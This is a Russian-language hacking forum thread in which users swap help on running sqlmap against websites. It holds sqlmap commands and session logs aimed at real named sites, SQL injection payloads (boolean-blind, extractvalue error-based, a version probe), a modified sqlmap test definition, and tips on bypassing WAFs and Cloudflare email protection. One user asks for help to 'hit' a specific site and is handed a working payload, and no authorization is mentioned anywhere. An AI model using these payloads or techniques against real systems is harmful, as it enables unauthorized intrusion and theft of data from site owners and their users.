Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    sqlmap -u "http://www.site/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa*/page/ " --dbs
     
    vladF likes this.
  2. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Как уработать ресурс до конца?


    [*] starting at 06:41:49
    [06:41:49] [INFO] parsing HTTP request from 'r.txt'
    custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
    [06:41:51] [INFO] resuming back-end DBMS 'microsoft access'
    [06:41:51] [INFO] testing connection to the target URL
    [06:41:53] [INFO] heuristics detected web page charset 'windows-1251'
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.bok-o-bok.ru:80/filmoteka.asp?film=412 AND 9579=9579&lan=2
    ---
    [06:41:53] [INFO] the back-end DBMS is Microsoft Access
    web server operating system: Windows 2008 R2 or 7
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP
    back-end DBMS: Microsoft Access
    [06:41:53] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
    [06:41:53] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
    [06:41:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [06:41:53] [INFO] retrieved:
    you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to me
    rge them in further requests? [Y/n] y
    [06:41:56] [INFO] heuristics detected web page charset 'ascii'
    [06:41:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
    [06:41:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
    [06:41:56] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
    [06:41:56] [ERROR] cannot retrieve table names, back-end DBMS is Access
    do you want to use common table existence check? [Y/n/q] y
    which common tables (wordlist) file do you want to use?
    [1] default 'C:\Python27\sqlmap\txt\common-tables.txt' (press Enter)
    [2] custom
    > 1
    [06:42:03] [INFO] checking table existence using items from 'C:\Python27\sqlmap\txt\common-tables.txt'
    [06:42:03] [INFO] adding words used on web page to the check list
    please enter number of threads? [Enter for 1 (current)] 4
    [06:42:13] [INFO] starting 4 threads
    [06:45:57] [WARNING] no table(s) found
    No tables found
    [06:45:57] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 3143 times
     
  3. aparsera

    aparsera New Member

    Joined:
    19 Jun 2018
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla

    Но мап ее не видит, подозреваю из-за OR OR
    Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?

    upd

    изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?

    <test>
    <title>OR boolean-based blind - WHERE or HAVING clause</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,9</clause>
    <where>2</where>
    <vector>OR [INFERENCE]</vector>
    <request>
    <payload>%27OR 1=1 OR %273%27=%273</payload>
    </request>
    <response>
    <comparison>%27OR 1=2 OR %273%27=%273</comparison>
    </response>
    </test>


    [03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER
    E or HAVING clause' injectable
    [03:55:51] [INFO] automatically extending ranges for UNION query injection techn
    ique tests as there is at least one other (potential) technique found
    [03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage
    of switch '--drop-set-cookie' if you experience any problems during data retriev
    al
    [03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals
    e positive
    [03:56:05] [WARNING] false positive or unexploitable injection point detected
    [03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
     
    #903 aparsera, 31 May 2019
    Last edited: 31 May 2019
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    чтоб sqlmap видел вектор через OR нужно указать --risk=3
     
    _________________________
  5. Timon B.

    Timon B. Member

    Joined:
    11 Mar 2014
    Messages:
    14
    Likes Received:
    7
    Reputations:
    0
    Как можно обойти Cloudflare email protection, когда вместо емейлов в дампе : /cdn-cgi/l/email-protection" class="cf_email" data-
    Нашел IP за Cloudflare, поставил его в hosts фаил в Windows. Но sqlmap/python это игнорит.

    Спасибо
     
  6. den4ik1090

    den4ik1090 New Member

    Joined:
    21 Jan 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подскажите как в мапе докрутить:
    [​IMG]
     
  7. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    60
    Likes Received:
    13
    Reputations:
    17
    Всем привет, кто может, помогите долбануть этот сайт:
    Code:
    http://wrappers.ru/?act=polls&poll=1%22%27
     
  8. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,770
    Likes Received:
    13,915
    Reputations:
    116
    Что значит долбануть?
    Привет..
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    1- вы ошиблись разделом
    2- там waf
    3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему.
    Code:
    http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
     
    #909 BabaDook, 21 Jun 2019
    Last edited: 21 Jun 2019
    ms13 likes this.
  10. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    60
    Likes Received:
    13
    Reputations:
    17
    спасибо
     
  11. hubby666

    hubby666 New Member

    Joined:
    24 Jun 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Проверьте запрос в ручную на что срабатывает WAF,обходите его и пишите свой tamper под него.
     
    _________________________
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    it happens, use the old version
     
  14. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    День добрый, господа.
    Есть такая скуль:
    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
    Code:
     Column count doesn't match value count at row 1
    Подскажите, реально ли такое засунуть в мап и как это сделать?
     
  15. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    60
    Likes Received:
    7
    Reputations:
    2
    привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
    в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
    [​IMG]
     
    #915 LeninDie, 5 Aug 2019
    Last edited: 5 Aug 2019
  16. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,988
    Likes Received:
    881
    Reputations:
    198
    у вас ответ а не запрос
     
    _________________________
  17. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    60
    Likes Received:
    7
    Reputations:
    2
    дополнил
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Делайте через

    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    и вариации
     
    _________________________
    BenderMR likes this.
  19. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    60
    Likes Received:
    7
    Reputations:
    2
    может кто нибудь подсказать решение?
     
  20. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    196
    Likes Received:
    609
    Reputations:
    101
    Ищи строку, которая всегда присутствует на неижектированной странице и неизменна(обязательно), но отсутствует при внедрении и false ответе
    Если добавляется какая-либо строка при false то использовать нужно --not-string="bsdhbhsb" , но при условии если она отсутствует при тру ответе
    По крайней мере так написано в манах
     
    BenderMR likes this.
Loading...